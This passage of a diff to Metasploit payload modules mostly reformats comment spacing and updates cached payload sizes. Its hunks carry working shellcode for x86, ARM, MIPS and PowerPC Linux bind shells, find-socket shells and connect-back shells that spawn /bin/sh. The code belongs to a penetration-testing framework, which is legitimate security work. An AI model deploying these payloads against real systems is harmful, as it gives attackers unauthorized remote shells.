"\xcd\x80" +# int $0x80 #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x68" +# pushl $0x68 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x89\x47\xec" +# movl %eax,-0x14(%edi) #
|
||||
"\xb0\x6a" +# movb $0x6a,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xb0\x1e" +# movb $0x1e,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xe4" +# decl -0x1c(%edi) #
|
||||
"\x79\xf6" +# jns <bndsockcode+42> #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x6a\x02" + # pushl $0x02 #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\xb0\x61" + # movb $0x61,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x68" + # pushl $0x68 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x89\x47\xec" + # movl %eax,-0x14(%edi) #
|
||||
"\xb0\x6a" + # movb $0x6a,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xb0\x1e" + # movb $0x1e,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xe4" + # decl -0x1c(%edi) #
|
||||
"\x79\xf6" + # jns <bndsockcode+42> #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,38 +32,38 @@ module MetasploitModule
|
|||
'CPORT' => [ 25, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x58" +# popl %eax #
|
||||
"\x58" +# popl %eax #
|
||||
"\x40" +# incl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x1f" +# pushl $0x1f #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x66\x81\x7f\x02\x04\xd2"+# cmpw $0xd204,0x02(%edi) #
|
||||
"\x75\xee" +# jne <fndsockcode+11> #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xf0" +# decl -0x10(%edi) #
|
||||
"\x79\xf6" +# jns <fndsockcode+30> #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x58" + # popl %eax #
|
||||
"\x58" + # popl %eax #
|
||||
"\x40" + # incl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x1f" + # pushl $0x1f #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x66\x81\x7f\x02\x04\xd2"+ # cmpw $0xd204,0x02(%edi) #
|
||||
"\x75\xee" + # jne <fndsockcode+11> #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xf0" + # decl -0x10(%edi) #
|
||||
"\x79\xf6" + # jns <fndsockcode+30> #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,36 +33,36 @@ module MetasploitModule
|
|||
'LPORT' => [ 8, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x7f\x00\x00\x01" +# pushl $0x0100007f #
|
||||
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x6a\x02" +# pushl $0x02 #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\xb0\x61" +# movb $0x61,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x62" +# pushl $0x62 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xe8" +# decl -0x18(%edi) #
|
||||
"\x79\xf6" +# jns <cntsockcode+34> #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x68\x7f\x00\x00\x01" + # pushl $0x0100007f #
|
||||
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x6a\x02" + # pushl $0x02 #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\xb0\x61" + # movb $0x61,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x62" + # pushl $0x62 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xe8" + # decl -0x18(%edi) #
|
||||
"\x79\xf6" + # jns <cntsockcode+34> #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -41,74 +41,74 @@ module MetasploitModule
|
|||
|
||||
payload =
|
||||
# turning on thumb mode
|
||||
"\xe2\x8f\x60\x01" +# add r6, pc, #1 #
|
||||
"\xe1\x2f\xff\x16" +# bx r6 #
|
||||
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
|
||||
"\xe1\x2f\xff\x16" + # bx r6 #
|
||||
|
||||
# thumb mode on
|
||||
# socket(2,1,0)
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x1c\x51" +# add r1, r2, #1 #
|
||||
"\x1c\x90" +# add r0, r2, #2 #
|
||||
"\x02\x0f" +# lsl r7, r1, #8 #
|
||||
"\x37\x19" +# add r7, r7, #0x19 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x06" +# mov r6, r0 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x1c\x51" + # add r1, r2, #1 #
|
||||
"\x1c\x90" + # add r0, r2, #2 #
|
||||
"\x02\x0f" + # lsl r7, r1, #8 #
|
||||
"\x37\x19" + # add r7, r7, #0x19 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x06" + # mov r6, r0 #
|
||||
|
||||
# bind()
|
||||
"\x22\x02" +# mov r2, #2 #
|
||||
"\x02\x12" +# lsl r2, r2, #8 #
|
||||
"\x32"+bytehigh +# add r2, r2, #0xXX #
|
||||
"\x02\x12" +# lsl r2, r2, #8 #
|
||||
"\x32"+bytelow +# add r2, r2, #0xXX #
|
||||
"\x1a\xdb" +# sub r3, r3, r3 #
|
||||
"\x1b\x24" +# sub r4, r4, r4 #
|
||||
"\x1b\x6d" +# sub r5, r5, r5 #
|
||||
"\x46\x69" +# mov r1, sp #
|
||||
"\xc1\x3c" +# stm r1!, {r2-r5} #
|
||||
"\x39\x10" +# sub r1, #0x10 #
|
||||
"\x22\x10" +# mov r2, #16 #
|
||||
"\x37\x01" +# add r7, r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x22\x02" + # mov r2, #2 #
|
||||
"\x02\x12" + # lsl r2, r2, #8 #
|
||||
"\x32"+bytehigh + # add r2, r2, #0xXX #
|
||||
"\x02\x12" + # lsl r2, r2, #8 #
|
||||
"\x32"+bytelow + # add r2, r2, #0xXX #
|
||||
"\x1a\xdb" + # sub r3, r3, r3 #
|
||||
"\x1b\x24" + # sub r4, r4, r4 #
|
||||
"\x1b\x6d" + # sub r5, r5, r5 #
|
||||
"\x46\x69" + # mov r1, sp #
|
||||
"\xc1\x3c" + # stm r1!, {r2-r5} #
|
||||
"\x39\x10" + # sub r1, #0x10 #
|
||||
"\x22\x10" + # mov r2, #16 #
|
||||
"\x37\x01" + # add r7, r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# listen()
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x1a\x49" +# sub r1, r1, r1 #
|
||||
"\x37\x02" +# add r7, r7, #2 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x1a\x49" + # sub r1, r1, r1 #
|
||||
"\x37\x02" + # add r7, r7, #2 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# accept()
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x37\x01" +# add r7, r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x06" +# mov r6, r0 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x37\x01" + # add r7, r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x06" + # mov r6, r0 #
|
||||
|
||||
# dup2()
|
||||
"\x1a\x49" +# sub r1, r1, r1 #
|
||||
"\x27\x3f" +# mov r7, #63 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x31\x01" +# add r1, r1, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x31\x01" +# add r1, r1, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1a\x49" + # sub r1, r1, r1 #
|
||||
"\x27\x3f" + # mov r7, #63 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x31\x01" + # add r1, r1, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x31\x01" + # add r1, r1, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# execve()
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x46\x78" +# mov r0, pc #
|
||||
"\x30\x12" +# add r0, #18 #
|
||||
"\x92\x02" +# str r2, [sp, #8] #
|
||||
"\x90\x01" +# str r0, [sp, #4] #
|
||||
"\xa9\x01" +# add r1, sp, #4 #
|
||||
"\x27\x0b" +# mov r7, #11 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x46\x78" + # mov r0, pc #
|
||||
"\x30\x12" + # add r0, #18 #
|
||||
"\x92\x02" + # str r2, [sp, #8] #
|
||||
"\x90\x01" + # str r0, [sp, #4] #
|
||||
"\xa9\x01" + # add r1, sp, #4 #
|
||||
"\x27\x0b" + # mov r7, #11 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# exit()
|
||||
"\x1b\x24" +# sub r4, r4, r4 #
|
||||
"\x1c\x20" +# mov r0, r4 #
|
||||
"\x27\x01" +# mov r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1b\x24" + # sub r4, r4, r4 #
|
||||
"\x1c\x20" + # mov r0, r4 #
|
||||
"\x27\x01" + # mov r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
cmd
|
||||
end
|
||||
end
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -74,7 +74,7 @@ module MetasploitModule
|
|||
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
|
||||
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
|
||||
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
|
||||
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
|
||||
host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x101
|
||||
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
|
||||
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
|
||||
"\xef\xff\x0c\x24" + # li t4,-17
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -32,60 +32,60 @@ module MetasploitModule
|
|||
'LPORT' => [ 58, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" +# lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" +# mr r22,r1 #
|
||||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x75\x1b\x78" +# mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" +# mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" + # lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" + # mr r22,r1 #
|
||||
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x75\x1b\x78" + # mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" + # mr r3,r21 #
|
||||
